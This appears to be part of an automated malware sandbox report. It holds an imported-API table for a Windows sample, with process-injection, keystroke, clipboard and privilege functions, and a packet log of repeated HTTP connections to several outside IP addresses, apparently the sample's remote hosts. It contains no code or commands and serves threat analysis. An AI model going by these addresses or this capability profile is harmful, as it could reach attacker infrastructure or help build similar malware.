                                                                                                            MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                            PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                            USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                            KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                            USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                            GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                            ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                            ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                            OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                                            Possible Origin

                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishGreat Britain
                                                                                                            EnglishUnited States

                                                                                                            Network Behavior

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Oct 7, 2024 15:55:01.227152109 CEST4989880192.168.2.9172.81.61.224
                                                                                                            Oct 7, 2024 15:55:01.232157946 CEST8049898172.81.61.224192.168.2.9
                                                                                                            Oct 7, 2024 15:55:01.233092070 CEST4989880192.168.2.9172.81.61.224
                                                                                                            Oct 7, 2024 15:55:01.241875887 CEST4989880192.168.2.9172.81.61.224
                                                                                                            Oct 7, 2024 15:55:01.246726036 CEST8049898172.81.61.224192.168.2.9
                                                                                                            Oct 7, 2024 15:55:22.599370956 CEST8049898172.81.61.224192.168.2.9
                                                                                                            Oct 7, 2024 15:55:22.599545002 CEST4989880192.168.2.9172.81.61.224
                                                                                                            Oct 7, 2024 15:55:22.601638079 CEST4989880192.168.2.9172.81.61.224
                                                                                                            Oct 7, 2024 15:55:22.606385946 CEST8049898172.81.61.224192.168.2.9
                                                                                                            Oct 7, 2024 15:55:27.669697046 CEST4997680192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:27.674603939 CEST804997681.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:27.674693108 CEST4997680192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:27.685478926 CEST4997680192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:27.690387011 CEST804997681.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:28.483776093 CEST804997681.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:28.483824968 CEST804997681.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:28.483834028 CEST804997681.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:28.483907938 CEST4997680192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:29.223108053 CEST4997680192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:30.227737904 CEST4997780192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:30.232573032 CEST804997781.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:30.232693911 CEST4997780192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:30.245855093 CEST4997780192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:30.250869989 CEST804997781.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:30.909902096 CEST804997781.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:30.910553932 CEST804997781.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:30.910712004 CEST4997780192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:31.793687105 CEST4997780192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:32.806618929 CEST4997880192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:32.811506033 CEST804997881.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:32.811769962 CEST4997880192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:32.822316885 CEST4997880192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:32.827167988 CEST804997881.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:32.827264071 CEST804997881.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:33.441025019 CEST804997881.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:33.490596056 CEST4997880192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:33.544121981 CEST804997881.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:33.544199944 CEST4997880192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:34.334490061 CEST4997880192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:35.352859974 CEST4997980192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:35.357777119 CEST804997981.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:35.357875109 CEST4997980192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:35.364209890 CEST4997980192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:35.369143009 CEST804997981.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:35.985527992 CEST804997981.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:35.985925913 CEST804997981.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:35.986062050 CEST4997980192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:35.988296986 CEST4997980192.168.2.981.2.196.19
                                                                                                            Oct 7, 2024 15:55:35.993100882 CEST804997981.2.196.19192.168.2.9
                                                                                                            Oct 7, 2024 15:55:41.115780115 CEST4998080192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:41.120845079 CEST804998094.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:41.120953083 CEST4998080192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:41.131969929 CEST4998080192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:41.136845112 CEST804998094.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:42.647192955 CEST4998080192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:42.653776884 CEST804998094.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:42.653913021 CEST4998080192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:43.665554047 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:43.906821012 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:43.906958103 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:43.917706013 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:43.922595978 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.195699930 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.195714951 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.195806980 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.195811987 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.195892096 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.197782993 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.214982986 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.215013981 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.215064049 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.215130091 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.241277933 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.241293907 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.241305113 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.241312027 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.241395950 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.258841038 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.258989096 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.259090900 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.285329103 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.285377026 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.285536051 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.314374924 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.314443111 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.314480066 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.314503908 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.314512968 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.314551115 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.314591885 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.315711975 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.315749884 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.315777063 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.322578907 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.322643042 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.325059891 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.326561928 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.428571939 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:46.458853960 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:46.463856936 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:46.463964939 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:46.541456938 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:46.546432018 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:46.546478033 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.854372978 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.854409933 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.854422092 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.854762077 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.877697945 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.877857924 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.877868891 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.877890110 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.878012896 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.914179087 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.914205074 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.914282084 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.914299965 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.914731979 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.915040016 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.937357903 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.960618973 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.960794926 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.966938972 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.966953039 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.967062950 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.969939947 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.969964027 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.969976902 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.970042944 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.970089912 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.970101118 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.970294952 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.970355988 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.970695972 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.970733881 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.970761061 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.973891973 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.992892981 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.992923021 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.993031025 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:48.005441904 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:48.005494118 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:48.005647898 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:48.053409100 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:49.074100971 CEST4998380192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:49.079297066 CEST804998394.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:49.079420090 CEST4998380192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:49.086323023 CEST4998380192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:49.091190100 CEST804998394.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:50.373863935 CEST804998394.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:50.373985052 CEST804998394.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:50.374123096 CEST4998380192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:50.378151894 CEST4998380192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:50.384005070 CEST804998394.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:55.406833887 CEST4998480192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:55.413455009 CEST80499843.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:55.413531065 CEST4998480192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:55.424530983 CEST4998480192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:55.429591894 CEST80499843.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:55.864438057 CEST80499843.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:55.864504099 CEST4998480192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:56.928318977 CEST4998480192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:56.933321953 CEST80499843.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:58.289206028 CEST4998580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:58.295213938 CEST80499853.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:58.295312881 CEST4998580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:58.306138992 CEST4998580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:58.311316013 CEST80499853.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:59.684597015 CEST80499853.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:59.684659004 CEST4998580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:59.818964005 CEST4998580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:59.824172020 CEST80499853.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:00.846481085 CEST4998680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:00.851675034 CEST80499863.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:00.851762056 CEST4998680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:00.865958929 CEST4998680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:00.870873928 CEST80499863.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:00.871140957 CEST80499863.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:01.297004938 CEST80499863.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:01.299933910 CEST4998680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:02.381467104 CEST4998680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:02.387451887 CEST80499863.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:03.415838003 CEST4998780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:03.421144009 CEST80499873.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:03.423413038 CEST4998780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:03.511662006 CEST4998780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:03.516693115 CEST80499873.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:06.821060896 CEST80499873.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:06.821106911 CEST80499873.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:06.823811054 CEST4998780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:06.827507973 CEST4998780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:06.832391977 CEST80499873.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:11.855611086 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:11.872035980 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:11.872265100 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:11.882992983 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:11.887938023 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438560963 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438580036 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438592911 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438604116 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438615084 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438627005 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438637018 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438636065 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:12.438648939 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438654900 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438683987 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:12.438889027 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438924074 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:12.443571091 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.443618059 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.443629026 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.443654060 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:12.443660021 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.443696022 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:13.397517920 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:14.415644884 CEST4998980192.168.2.9209.74.95.29
